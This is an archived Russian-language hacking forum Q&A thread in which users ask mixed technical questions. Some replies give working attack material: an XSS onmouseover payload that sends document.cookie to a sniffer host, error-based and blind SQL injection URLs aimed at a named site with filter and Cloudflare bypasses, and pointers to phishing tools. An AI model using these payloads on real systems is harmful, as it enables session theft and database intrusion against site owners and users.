PDA

Просмотр полной версии : Задаем вопросы)


Arboretum
10.05.2015, 19:30
Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?

OxoTnik
10.05.2015, 19:33
↑ (https://antichat.live/posts/3845255/)
Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?


html это не язык программирования

но отвечая на твой вопрос, да существуют, а ещё я вчера видел мамонта, он бегал по радуге, и отдал мне мою плюшку.

MaxFast
10.05.2015, 19:35
Есть ли шеллы на Brainfuck?

Alexandr II
10.05.2015, 19:59
↑ (https://antichat.live/posts/3845263/)
Смотрю тут батьки троллинга сидят. А ведь задал обычный легкий вопросик на который даже знал ответа, хотел какой-нибудь вопросик банальный к теме прицепить...


если знаешь ответ, зачем спрашивать? задавай вопрос, который тебя интересует, и будет нормальный ответ

BabaDook
10.05.2015, 20:05
↑ (https://antichat.live/posts/3845278/)
Ожидал что-то вроде "Мой вопрос" - "Ответ", "Следующий вопрос" - "Ответ"... Но нет, надо же обязательно прицепиться к каждому слову и начать великий срач...


html шелов нету.

Cthulchu
10.05.2015, 20:36
↑ (https://antichat.live/posts/3845260/)
да существуют


Не надо вводить в заблуждение людей.

Есть что ответить - ответь. Нету - не отвечай.

Для того, чтобы стебаться над новичками много ума не надо.

Епт, как смешно, html-шелл!

ЗЫ

формально HTML - это язык программирования.

tiger_x
10.05.2015, 21:45
Объясните как использовать xss onmouseover= ?

Желательно с примером скрипта вытягивания куки внутри onmouseover.

faza02
10.05.2015, 21:53
↑ (https://antichat.live/posts/3845334/)
Объясните как использовать xss onmouseover= ?
Желательно с примером скрипта вытягивания куки внутри onmouseover.


примерно так:


onmouseover="(new+Image()).src='//sniffer'%2bdocument.cookie"

tiger_x
10.05.2015, 21:57
↑ (https://antichat.live/posts/3845338/)
примерно так:

onmouseover="(new+Image()).src='//sniffer'%2bdocument.cookie"



Может глупый вопрос. А где сниффер взять?

BabaDook
10.05.2015, 21:58
↑ (https://antichat.live/posts/3845343/)
Может глупый вопрос. А где сниффер взять?


в интернете() google.de

faza02
10.05.2015, 22:00
↑ (https://antichat.live/posts/3845343/)
Может глупый вопрос. А где сниффер взять?


вот, например:

http://www.truehackers.ru/articles/programming/3761-sniffer-na-php

да любой из гугла можно взять по "xss sniffer"

faza02
10.05.2015, 22:06
↑ (https://antichat.live/posts/3845351/)
http://mr.lumbolka.ru/ru/index.php?id=-100+union+select
+user()+--+ -
403 Forbidden

Подскажите пожалуйста как сделать что бы запрос прошёл. Кодировал url кодировкой , делал бувер оферфлов но всё равно не проходит.




http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,ve rsion()))

так же пройдет UnIoN, только я вывод не нашел.

tiger_x
10.05.2015, 22:07
↑ (https://antichat.live/posts/3845352/)
вот, например:
http://www.truehackers.ru/articles/programming/3761-sniffer-na-php
да любой из гугла можно взять по "xss sniffer"


спасибо

BabaDook
10.05.2015, 22:12
↑ (https://antichat.live/posts/3845356/)

http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,ve rsion()))

так же пройдет UnIoN, только я вывод не нашел.


Спасибо, такое наверное прокатит, там кодировка сбита, трудно будет искать вывод в исходнике.

Всё спасибо . Смотри


http://mr.lumbolka.ru/ru/index.php?id=100+and+false+and+extractvalue%281,co NCat%280x3a,version%28%29%29%29+--+%20-

Mister_Bert0ni
11.05.2015, 01:58
↑ (https://antichat.live/posts/3845255/)
Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?


Увы HTML это не серверный язык а всего лишь язик гипертекстовой разметки...Так сказать визуализация страницы...SHELL-ы есть под те языки на которых работают WEB-сервера.На сегодняшний день мне известны asp aspx cfm jsp perl php - шеллы...Для примера можно заглянуть в /usr/share/webshells если пользуешся Kali Linux..

Mister_Bert0ni
11.05.2015, 02:09
↑ (https://antichat.live/posts/3845351/)
http://mr.lumbolka.ru/ru/index.php?id=-100+union+select
+user()+--+ -
403 Forbidden

Подскажите пожалуйста как сделать что бы запрос прошёл. Кодировал url кодировкой , делал бувер оферфлов но всё равно не проходит.


http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(current _user()))

vBr
11.05.2015, 02:23
Вопрос,

Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?

Cthulchu
11.05.2015, 02:38
↑ (https://antichat.live/posts/3845467/)
Вопрос,
Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?


если в процессе взлома вам какм-либо удалось получить доступ к файловой системе, то да, вы имеете такую возможность.

Ваш К.О.

vBr
11.05.2015, 16:04
Вопрос,

Раньше FireFox в гугле вобью что нибудь и бегаю по ссылка нажимал левой кнопкой мыши -влкдака открывалась отдельно, сейчас переходит сразу же по ссылки т.е не открывается отдельно, в настройках в Мозиле в разделе Влкдаки все проверил не че не нашел, не обновлял не менял фф, как это исправить? хочу как раньше что бы открывалась сразу новая вкладка,

Johnydriver
11.05.2015, 16:07
Есть кто-то к кому можно обратиться чтобы взломал джаст или смарт сервис рассылок и достал оттуда свежые емейл адреса? (не для продажи, а для личного использования - спама)

Если да, подскажите к кому?

Babadyc
11.05.2015, 16:09
Я тут нашел открытие в новом окне https://support.mozilla.org/ru/kb/nastrojki-i-parametry-vkladok

Надеюсь поможет, но такие вопросы лучше у Гугла спрашивать ))

vBr
11.05.2015, 16:11
↑ (https://antichat.live/posts/3845713/)
Я тут нашел открытие в новом окне
https://support.mozilla.org/ru/kb/nastrojki-i-parametry-vkladok
Надеюсь поможет, но такие вопросы лучше у Гугла спрашивать
))


нет это не то гуглю... безрезультативно

Johnydriver (http://mzxxe5ln.mfxhi2ldnbqxiltsou.cmle.ru/members/263112/), запрещено в данном разделе.

решил свою задачу. это в гугле нужно было настройки нажать и открывать в новном окне - но будет открывать в новой вкладке

vBr
11.05.2015, 16:47
Ребят подскажите,

osCommerce (http://www.ozeworks.com/) является полностью бесплатной cms? знаю что OpenCart бесплатная cms, в бушующим для интеграции с 1c-bitrix будут ли проблемы если выбрать движек и заточить шаблон под Opencart? или лучше с osCommerce работать?

2. Можно ссылку на "Бесплатные Cms Интернет Магазина" а так же "Русские Cms Интернет Магазина" на источник с habrahabr

Спасибо

Babadyc
11.05.2015, 16:50
http://www.cmsmagazine.ru/catalogue/ пользуйся

bermix666
11.05.2015, 19:12
Мой вопрос администрации форума, почему закрыты соц.сети раздел, ведь у вас там кидалы в темах предлагают услуги! За этим нужно следить и удалять этих мошенников. А конкретно ник

Ultrasss (https://antichat.live/members/160729/) было заказано 1000 подписчиков и переведены деньги. Реакции ноль, на сообщения не отвечает. Могу скрины переписки приложить и перевода.

vBr
12.05.2015, 05:46
Вопрос,

Создал ИМ, можно ли подключить все возможные платежные системы такие как Qiwi, Яндекс.Деньги Webmoney Visa/Master из перечисленых к Им, не использую робокассу, т.е не платить проценты?

OxoTnik
12.05.2015, 05:54
↑ (https://antichat.live/posts/3846016/)
Вопрос,
Создал ИМ, можно ли подключить все возможные платежные системы такие как Qiwi, Яндекс.Деньги Webmoney Visa/Master из перечисленых к Им, не использую робокассу, т.е не платить проценты?


кого ты там создал? ИМ ?

Если это интернет магазин то так и скажи, тут экстрасенсов нет!

Ответ на твой вопрос, да можно.

В каждой из платёжных систем, есть раздел с подробным описанием для сайта.

M_script
12.05.2015, 10:28
↑ (https://antichat.live/posts/3845820/)
почему закрыты соц.сети раздел


В этой теме все написано - /threads/424907/ (https://antichat.live/threads/424907/) ("Для тех, кто только что зарегистрировался !!!")


↑ (https://antichat.live/posts/3845820/)
Могу скрины переписки приложить и перевода.


Если можете, почему не приложили?


↑ (https://antichat.live/posts/3845820/)
За этим нужно следить и удалять этих мошенников.


Проверить выполнение условий сделки, не участвуя в этой сделке, чаще всего невозможно. Скрины и логи легко подделать. Для проведения безопасных сделок на форуме есть сервис гарантов - /threads/63165/ (https://antichat.live/threads/63165/). Аналогичные сервисы есть у многих платежных систем. Например, Escrow.WebMoney - https://escrow.webmoney.ru/

M_script
12.05.2015, 10:44
↑ (https://antichat.live/posts/3846016/)
Создал ИМ, можно ли подключить все возможные платежные системы такие как Qiwi, Яндекс.Деньги Webmoney Visa/Master из перечисленых к Им, не использую робокассу, т.е не платить проценты?


Делай как все нормальные люди - закладывай в стоимость товара комиссию агрегатора.

Подключать отдельно мерчанты всех ЭПС выйдет дороже. А за прием Visa/MC процент придется платить в любом случае.

P.S.: В следующий раз пиши OS (online shop). Мы здесь очень любим загадки на телепатию.

vBr
12.05.2015, 16:31
Подкиньте Ссылку, где можно просмотреть Сайт или Шаблон на Адаптацию, т.е просмотреть с Смартфона, с Ляптопа Планшета ТВ и т.д

Федор
12.05.2015, 21:07
Здравствуйте. Подскажите как хешкет запустить oclhashcat 1.45 gui 044 карточка radeon hd 4300/4500 ос win7 драйвера 13.1 самые последние для этой карты. Ставил более ранние версии драйвера с 12.2,3,4,5 хвосты чистил DriverSweeper результат ноль. Hashcat выдает ошибку clBuildProgram -11. http://s003.radikal.ru/i204/1505/13/110f12eabc5e.png

Ronin457
12.05.2015, 21:48
Всем Большой Привет!

Ищется инфа о акках (авторег) зарегины на номер +4

Какая та лайзейка вроде как есть там.

Спасибо.

п.с.можно в личку.

п.с.с.чуть не забыл! Пользовался услугой по покупке аков ВК, человек меня кинул.

Как мне его наказать?Все доказательства есть.Спасибо.

blaga
13.05.2015, 07:36
↑ (https://antichat.live/posts/3846269/)
Подкиньте Ссылку, где можно просмотреть Сайт или Шаблон на Адаптацию, т.е просмотреть с Смартфона, с Ляптопа Планшета ТВ и т.д


themeforest.net

blaga
13.05.2015, 12:43
подскажите нубу, что за херня вылазит в phpMyadmin и как это пофиксить.

http://i.imgur.com/KXRAAsA.jpg

пробовал чистить куки помогает только на одну перезагрузку страницы, потом снова появляется.

Arboretum
13.05.2015, 14:09
↑ (https://antichat.live/posts/3846697/)
подскажите нубу, что за херня вылазит в phpMyadmin и как это пофиксить.
http://i.imgur.com/KXRAAsA.jpg
пробовал чистить куки помогает только на одну перезагрузку страницы, потом снова появляется.


Добавь в php.ini строку:

session.save_path = "C:/php/tmp" или

session.save_path = "/tmp"

И создай каталог C:/php/tmp

blaga
13.05.2015, 14:14
↑ (https://antichat.live/posts/3846732/)
Добавь в php.ini строку:
session.save_path = "C:/php/tmp" или
session.save_path = "/tmp"
И создай каталог C:/php/tmp


косяк в том что это на подломленном хостинге.

Arboretum
13.05.2015, 14:18
↑ (https://antichat.live/posts/3846735/)
косяк в том что это на подломленном хостинге.


FTP доступа нету?

Arboretum
13.05.2015, 14:25
Без доступа вряд ли сможешь наладить это... Погуглил, не нашел других путей...

blaga
13.05.2015, 14:32
↑ (https://antichat.live/posts/3846744/)
Без доступа вряд ли сможешь наладить это... Погуглил, не нашел других путей...


спасиб, но пока вопрос открыт остался. не думаю что у админа такая же фигня, а я ведь под админскими правами захожу.

Viktoria
13.05.2015, 21:03
Привет всем! Подскажите пожалуйста! Есть ли тут люди, которые могут помочь со взломом почтового ящика? заранее спасибо.

Suicide
13.05.2015, 21:05
↑ (https://antichat.live/posts/3846912/)
Привет всем! Подскажите пожалуйста! Есть ли тут люди, которые могут помочь со взломом почтового ящика? заранее спасибо.


Не подскажем.

Такие темы и вопросы тут в запрете и по правилам форума и по правилам раздела.

shaydulla
13.05.2015, 21:08
подскажите кто знает где можно купить рефералов http://www.wmmail.ru активных?

оlbaneс
13.05.2015, 21:10
↑ (https://antichat.live/posts/3846915/)
подскажите кто знает где можно купить рефералов
http://www.wmmail.ru
активных?


Ошиблись форумом.

BabaDook
13.05.2015, 21:18
Есть тут счастливчики которые находили сайты с уязвимостью харблед, шелшок, друпал 7й версии sql-инъекций

shaydulla
13.05.2015, 21:54
Сумма: 0.0009 BTC

Адрес: 1CKqo85eVq79E1zMUYB9sLbuXYM7fR9vxA

Хэш транзакций: 0a284caa31d2f6ed399187272579124cbd760892b1074ec7b2 4135c2b51ed9d4

blockchain.info (https://blockchain.info/tx/0a284caa31d2f6ed399187272579124cbd760892b1074ec7b2 4135c2b51ed9d4)

сырье сделка

0100000001649FA203EBC25A8DFE93F752FA3CBF6EF5AF0948 6CB73F05CE610479DA2754E5000000006A473044022042D563 C839BA7BB75B44F86FE1D81EA4CCE152A5D4B057F5CD2D0055 C36ED69A02205C58CB7F49045008AF6F6E96417B6C2F6C0439 E97FE84ACE694F0C444F1C007501210302F582955E175427D1 E8990F66095ABC966BAE1FC59B6FD300E5D79324FFC491FFFF FFFF01905F0100000000001976A9147C399A66381714ABA710 4A05AE88B54E07CCAC5188AC00000000

Кто объяснит, чьто такое сырье?

BigBear
13.05.2015, 22:06
↑ (https://antichat.live/posts/3846925/)
Есть тут счастливчики которые находили сайты с уязвимостью харблед, шелшок, друпал 7й версии sql-инъекций


Это не счастливчики. Любой более менее уважающий себя пентестер щупал всё тобой перечисленное.

shaydulla
13.05.2015, 22:12
Как оформить группу в контакте с помощью вики разметки?

faza02
14.05.2015, 01:41
↑ (https://antichat.live/posts/3846950/)
Как оформить группу в контакте с помощью вики разметки?


https://vk.com/page-4489985_2974033

IamQWERTY
10.05.2020, 12:09
Вопрос,

есть сайт


site.com/forum/post?id=12345

1. защищен cloudflare, но вроде бы нашел ip сервера и подключился напрямую, так что не проблема

2. базовая waf от apache, обходится простым url кодированием

Узнал таблицу и колонку, но когда пробую подбирать username


site.com/forum/post?id=12345+and+substring((SEL%45CT+username+FRO M+user+LIMIT+0,1),1,1)="a"

выводит HTTP ERROR #500

Пробовал url-кодированием и hex-ом, так что вряд-ли это какой-то waf. Думаю, на сервере ошибка когда пытаюсь вывести данные из таблицы

Может у кого-нибудь есть идеи?

fandor9
10.05.2020, 22:46
↑ (https://antichat.live/posts/4386245/)

site.com/forum/post?id=12345+and+substring(SEL%45CT+username+FROM +user+LIMIT+0,1),1,1)="a"

Может у кого-нибудь есть идеи?


Если я не ошибаюсь, то у вас не хватает 2-ой открывающей скобки между substring и select


site.com/forum/post?id=12345+and+substring((SEL%45CT+username+FRO M+user+LIMIT+0,1),1,1)="a"

IamQWERTY
11.05.2020, 00:17
↑ (https://antichat.live/posts/4386390/)
Если я не ошибаюсь, то у вас не хватает 2-ой открывающей скобки между substring и select

site.com/forum/post?id=12345+and+substring((SEL%45CT+username+FRO M+user+LIMIT+0,1),1,1)="a"



Упс, извиняюсь, но не из-за этого. Писал вручную и не заметил(

Seyki
15.06.2020, 12:18
Что лучше в Java?

Eclipse или JetBrains Intellij IDEA?

ltbdr
23.06.2020, 18:14
а есть шанс что меня взломают Вк, если у меня стоит вход по смс?

Turanchocks_
24.06.2020, 00:30
↑ (https://antichat.live/posts/3845297/)
формально HTML - это язык программирования.


Формально ты - тупой еблан. Гипертекстовая разметка не особо про программирование. Если только для таких как ты. Ну ткогда и шрифт Брайля - про программирование. и Ариал с Верданой.

fandor9
24.06.2020, 01:22
↑ (https://antichat.live/posts/4395991/)
а есть шанс что меня взломают Вк, если у меня стоит вход по смс?


да, шанс всегда есть.

Turanchocks_
24.06.2020, 05:58
↑ (https://antichat.live/posts/4396071/)
да, шанс всегда есть.


Ну типа - да .... Перехват смс, если мы говорим о шансе. Ну мало ли че еще можно замутить.

fandor9
24.06.2020, 11:02
↑ (https://antichat.live/posts/4396093/)
Ну типа - да .... Перехват смс, если мы говорим о шансе. Ну мало ли че еще можно замутить.


ну помимо перехвата на уровне протокола, есть ещё возможность красть/снимать их сразу с телефона. Или же через фишинг и evilginx (https://github.com/kgretzky/evilginx2)

user93
24.06.2020, 16:55
Здравствуйте, во сколько ждать телетрансляцию передачи: Что? Где? Когда? ;)

Turanchocks_
25.06.2020, 02:38
Кто проживает на дне океана?

Seyki
25.06.2020, 12:51
↑ (https://antichat.live/posts/4396295/)
Кто проживает на дне океана?


Моя самооценка

fandor9
25.06.2020, 13:17
↑ (https://antichat.live/posts/4396295/)
Кто проживает на дне океана?


осадок